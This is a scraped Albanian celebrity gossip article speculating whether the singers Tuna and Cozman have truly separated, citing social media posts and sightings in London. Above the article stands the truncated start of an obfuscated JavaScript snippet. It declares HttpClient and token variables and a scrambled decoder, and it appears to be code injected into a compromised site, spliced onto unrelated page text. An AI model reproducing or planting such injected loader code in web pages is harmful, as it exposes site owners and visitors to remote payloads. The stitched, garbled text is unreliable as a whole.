;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

A janë ndarë me të vërtetë Tuna dhe Cozman ?!

By

“Çdo publicitet është publicitet i mirë”. Kjo fjali dëfton më së miri parimin kryesor me të cilin funksionon bota e showbizit jo vetëm në botë por edhe tek ne.

Ka fare pak rëndësi se me çfarë konutacioni fiton vëmendje, e rëndësishme është të përflitesh.

Një strategji të tillë ndoshta e kanë vënë në funksion çifti Tuna dhe Cozman. Pa kaluar as dy javë të plota nga publikimi i lajmit për ndarjen, pyetja që po lind natyrshëm është: A e kanë seriozisht ndarjen Fenix-at ?!.

Dyshimi erdhi pas një varg statusesh nga Tuna në rrjete sociale të nxjerra nga tekstet e këngëve të saj që megjithëse publikisht nuk i adresoheshin askujt, në kontekst përputheshin në përpikmëri me situatën e saj, ndarjen.

Logjikisht, asnjë njeriu normal nuk do t’ia lejonte egoja e tij që publikisht të krijojë imazhin e një ‘të dëshpëruari’ që në vend se të ec përpara me jetën, zgjedh të stagnojë e të merret me të kaluarën në rrjete sociale.

Kjo besohet edhe më pak kur bëhet fjalë për Tunën e cila ka dëshmuar se është e zonja t’i bëjë llogaritë në mënyrën e duhur dhe përpara audiencës të reflektoj një ‘iron lady’.

Edhe nëse e anashkalojmë këtë aspekt janë një sërë farktesh të tjera që i hedhin benzinë zjarrit të skepticizmit në lidhje me zhvillimin e ndarjes së çiftit.

Tuna, një javë pas Cozman merr rrugë për në kryeqytetin britanik shkaku i impenjimeve me brendin e veshjeve KTZ si e ftuar në London Fashion Week. Edhe më parë bashkë me Cozman kishin ndërtuar bashkëpunim të mirë me emra të këtij brendi dhe me gjasë janë takuar atje, larg vëmendjes së mediave.

Prapavija e fotove të postuara nga dyshja në Instagram është një veturë e njejtë ngjyrë e bardhë nga e cila del Cozman duke pozuar në Instagram përderisa Tuna shfaqet afër saj.

Madje disa nga mediat shqiptare duke iu referuar burimeve, shkruan sot se dyshja janë parë bashkë në Pulse Club të Londrës.

Se cila është e vërteta a janë ndarë me të vërtetë apo janë ribashkuar së fundmi, mbetet të shihet kur (ish)-çifti do vendosë të flasë duke mos zgjedhur heshtjen siç kanë vepruar deri më tani. /Prive.al/

IMG_20150919_1

Artikuj të ngjashëm